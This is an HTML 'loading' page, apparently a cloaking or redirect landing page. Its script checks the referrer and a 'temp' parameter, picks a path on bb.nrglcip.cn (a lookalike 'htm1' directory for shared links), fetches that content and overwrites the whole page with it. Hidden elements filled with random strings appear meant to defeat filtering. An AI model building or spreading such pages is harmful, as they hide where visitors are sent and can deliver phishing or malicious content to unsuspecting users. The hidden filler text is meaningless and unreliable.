<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kFO6KEsEVO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kFO6KEsEVO .ks7Gkdj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kFO6KEsEVO .content {
            line-height: 50px;
            text-align: center
        }

        .kFO6KEsEVO .img {
            width: 100%
        }

        .kFO6KEsEVO .GXgBa5qC {
            text-align: center
        }

        .kFO6KEsEVO .GXgBa5qC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kFO6KEsEVO .GXgBa5qC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kFO6KEsEVO .GXgBa5qC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kFO6KEsEVO .GXgBa5qC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kFO6KEsEVO .GXgBa5qC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kFO6KEsEVO .GXgBa5qC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kFO6KEsEVO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZrnHqIBMif1jr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ygZwrM = ZrnHqIBMif1jr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ygZwrM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ygZwrM +".html?a=share";
		}
		
        GJPBuWpGo=url+"#"+new Date().getTime();
        GJPBuWpGo && function() {
            $.get(GJPBuWpGo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>q0Y61QOqTUDGzjCIQxXRWElHNhtC3jGUnyZJWytaTllT</p>
<ul style='display:none' >xJxX4Nvw5NTtVTXNG3jJlf1Z1pGiSArEj5fBnZ7BUPqHRJzZ2FDjH9u7nL2xNiyl</ul>
<div style='display:none'>EuM0rAoB97swXb0GKDEP5Cti1fTXWZxyQjelvFcME3V5E8D6mesdzSo3aSH0Q33Q4681xRkTJwc7</div>
<a  href='#' style='display:none'>s0XKkK9jtquYsgQmMlW9peR2O4ip1pP8JLMhVfcAv71N9dnMDf</a>
<img  src='' style='display:none'><div class="kFO6KEsEVO">
    <div class="ks7Gkdj">
        <div class="GXgBa5qC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >cTSY4spduDrceEoLQ1iS8eOeqTJFTSjxIbBXDTWxsmEqB4cHtHAiGHdKvZzMsJJbQWwNLlWBzoTbekodPFmle2thYmN</ul>
<h1 style='display:none' >aQiXKrlAeueJVHka7zRiptmvBzxMvTRtOSAdiOc5SY783cwT2blnI8QFqv8GMk</h1>
<div style='display:none'>YaosRJuoGOKxmTwal7ixZlKwD1BOBow</div>
<img  src='' style='display:none'>
<span style='display:none'>f8aHK6P9gwKcoKwt8Gc2n0zov82m4xoY8opijigPWGd9x8wnFfuLx9Hab9KPuEytQZUMvbL5nlKYYR9MLF3KwAIxHnLRZ2tNZHL</span></body>
</html>